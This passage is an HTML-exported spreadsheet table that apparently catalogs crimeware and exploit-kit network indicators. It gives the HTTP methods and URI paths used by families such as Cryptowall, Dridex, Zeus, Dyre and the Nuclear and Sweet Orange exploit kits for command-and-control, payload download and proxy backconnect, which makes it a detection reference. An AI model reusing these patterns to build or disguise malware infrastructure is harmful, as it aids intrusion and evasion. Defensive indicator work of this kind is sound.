<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Asprox / Kuluoz</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Chanitor"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Chanitor</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/gate.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/gate.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Chanitor Downloads"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Chanitor Downloads</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/wp-includes/js/tinymce/plugins/wpfullscreen/1.php\n/wp-includes/js/tinymce/skins/lightgray/1.php\n/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php\n/wp-includes/js/tinymce/plugins/wpfullscreen/1.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/wp-includes/js/tinymce/plugins/wpfullscreen/1.php<br />/wp-includes/js/tinymce/skins/lightgray/1.php<br />/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php<br />/wp-includes/js/tinymce/plugins/wpfullscreen/1.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptowall"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/532boskc3i0\n/nvebi4m4ggdokz\n/wbkljtzpimbryt"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/532boskc3i0<br />/nvebi4m4ggdokz<br />/wbkljtzpimbryt</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptowall"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/wp-content/themes/exiportal/dh5x3a1815j \n/wp-content/themes/esther/6l7de"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/wp-content/themes/exiportal/dh5x3a1815j <br />/wp-content/themes/esther/6l7de</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dridex payload"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dridex payload</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/mopsi/popsi.php\n/js/bin.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mopsi/popsi.php<br />/js/bin.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Fake AV post compromise"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Fake AV post compromise</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Fiesta EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Fiesta EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/txf9p_v8/ye1PlchZ7X9pFcl0o-y3\n/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287\n/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/txf9p_v8/ye1PlchZ7X9pFcl0o-y3<br />/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287<br />/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Flashpack EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Flashpack EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/sv62a76d18537/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/sv62a76d18537/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"GameThief"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GameThief</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/tj.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/tj.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"GameThief"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GameThief</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Gypothy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gypothy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/bigbight/kinkong.txt"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/bigbight/kinkong.txt</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"H-W0rm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">H-W0rm</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/SpCoderHere"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/SpCoderHere</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"KaiXin EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">KaiXin EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/indexindex/\n/indexindex/gg.jpg\n/indexindex/jquery-1.4.2.min.js\n/indexindex/swfobject.js\n/indexindex/main.html\n/xzz1.exe\n/indexindex/NlNwQh.jar\n/indexindex/com.class\n/indexindex/edu.class\n/indexindex/net.class\n/indexindex/org.class"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/indexindex/<br />/indexindex/gg.jpg<br />/indexindex/jquery-1.4.2.min.js<br />/indexindex/swfobject.js<br />/indexindex/main.html<br />/xzz1.exe<br />/indexindex/NlNwQh.jar<br />/indexindex/com.class<br />/indexindex/edu.class<br />/indexindex/net.class<br />/indexindex/org.class</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kovter"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Kovter</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/9/form.php \n/11/form.php\n/w1/form.php\n/1/feed.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/9/form.php <br />/11/form.php<br />/w1/form.php<br />/1/feed.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nuclear EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nuclear EK</span></td><td data-sheets-value="[null,2,"GET / POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET / POST</span></td><td data-sheets-value="[null,2,"/XhBWV0gBT08OVFVW.html\n/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA\n/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/XhBWV0gBT08OVFVW.html<br />/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA<br />/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Poweliks"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Poweliks</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2\n/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2\n/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2\n/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2<br />/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2<br />/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2<br />/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Redirect to Fiesta EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Redirect to Fiesta EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &\nm_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &<br />m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sweet Orange EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sweet Orange EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/admin4_account/mobile/movies.php?timeline=18\n/bad/generic/help.php?state=39\n/cnet/tmp/Indy_admin/investor.php?setup=20\n/dbadmin/wp-admin/hex/help.php?state=33\n/forums/example/screens/investor.php?setup=20\n/gcc/tmp/bad/help.php?state=25\n/ip/ch/investor.php?setup=20\n/profiles/stat/movies.php?timeline=21"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/admin4_account/mobile/movies.php?timeline=18<br />/bad/generic/help.php?state=39<br />/cnet/tmp/Indy_admin/investor.php?setup=20<br />/dbadmin/wp-admin/hex/help.php?state=33<br />/forums/example/screens/investor.php?setup=20<br />/gcc/tmp/bad/help.php?state=25<br />/ip/ch/investor.php?setup=20<br />/profiles/stat/movies.php?timeline=21</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Sweet Orange EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Sweet Orange EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064\n/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair\n/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix\n/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249\n/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535\n/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil\n/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954\n/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064<br />/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair<br />/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix<br />/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249<br />/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535<br />/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil<br />/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954<br />/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"TBD"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">TBD</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/store/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/store/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"TBD Post Flashpack"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">TBD Post Flashpack</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ\n/search?q=wrestling&subid=4699\n/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ<br />/search?q=wrestling&subid=4699<br />/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"TBD Proxy (Htbot?)"]" style="padding: 2px 3px; vertical-align: bottom;"><span style="font-size: x-small;">TBD Proxy (Htbot?)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ocfg.php?command=getip\n/ocfg.php?command=getid\n/ocfg.php?command=ghl&id=1493496\n/ocfg.php?command=dl&id=1493496\n/ocfg.php?command=version&id=1493496\n/ocfg.php?command=getbackconnect\n/pointer.php?proxy=<IP>%3A24635&secret=BER5w4evtjszw4MBRW"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ocfg.php?command=getip<br />/ocfg.php?command=getid<br />/ocfg.php?command=ghl&id=1493496<br />/ocfg.php?command=dl&id=1493496<br />/ocfg.php?command=version&id=1493496<br />/ocfg.php?command=getbackconnect<br />/pointer.php?proxy=<ip>%3A24635&secret=BER5w4evtjszw4MBRW</ip></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Upatre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Upatre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1501us22/<PC--NAME>/0/51-SP3/0/\n/1501us22/<PC--NAME>/1/0/0/\n/2807cw/<PC-Name>/1/0/0/\n/2807cw/<PC-Name>/41/5/4/\n/2807cw/<PC-Name>/0/51-SP2/0/\n/1201uk1/<PC-Nam/0/61/0/ \n/1201uk1/<PC-Name>/0/51-SP3/0/ \n/1201uk1/<PC-Name>/1/0/0/ \n/1201uk1/<PC-Name>/41/7/4/ \"\n/2307stat/<PC-Name>/0/51Service%20Pack%202/0/\n/2307stat/<PC-Name>/1/0/0/\n/2307stat/<PC-Name>/41/5/4/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1501us22/<pc--name>/0/51-SP3/0/<br />/1501us22/<pc--name>/1/0/0/<br />/2807cw/<pc-name>/1/0/0/<br />/2807cw/<pc-name>/41/5/4/<br />/2807cw/<pc-name>/0/51-SP2/0/<br />/1201uk1/<pc-nam br="">/1201uk1/<pc-name>/0/51-SP3/0/ <br />/1201uk1/<pc-name>/1/0/0/ <br />/1201uk1/<pc-name>/41/7/4/ "<br />/2307stat/<pc-name>/0/51Service%20Pack%202/0/<br />/2307stat/<pc-name>/1/0/0/<br />/2307stat/<pc-name>/41/5/4/</pc-name></pc-name></pc-name></pc-name></pc-name></pc-name></pc-nam></pc-name></pc-name></pc-name></pc--name></pc--name></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vavtrak / Neverquest"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Vavtrak / Neverquest</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/collection/0000004E/00/9EBD6132"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/collection/0000004E/00/9EBD6132</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/backup/config.bin\n/en/images/config.bin\n/guardnow/config.bin\n/guardnow/config.bin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/backup/config.bin<br />/en/images/config.bin<br />/guardnow/config.bin<br />/guardnow/config.bin</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/choosen/helps/file.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/choosen/helps/file.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"AdWare Kraddare.IL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">AdWare Kraddare.IL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long string> ..@RwNPRwNN::"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long="" string=""> ..@RwNPRwNN::</very></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"AdWare Kraddare.IL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">AdWare Kraddare.IL</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/bv/config.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/bv/config.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/2001uk11/HOME/1/0/0/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/2001uk11/HOME/1/0/0/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/mandoc/eula012.pdf"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mandoc/eula012.pdf</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/mandoc/ml1from1.tar"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mandoc/ml1from1.tar</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dyre plugin dl"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dyre plugin dl</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ineede900.rar"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ineede900.rar</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kazy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Kazy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR</span></td></tr>
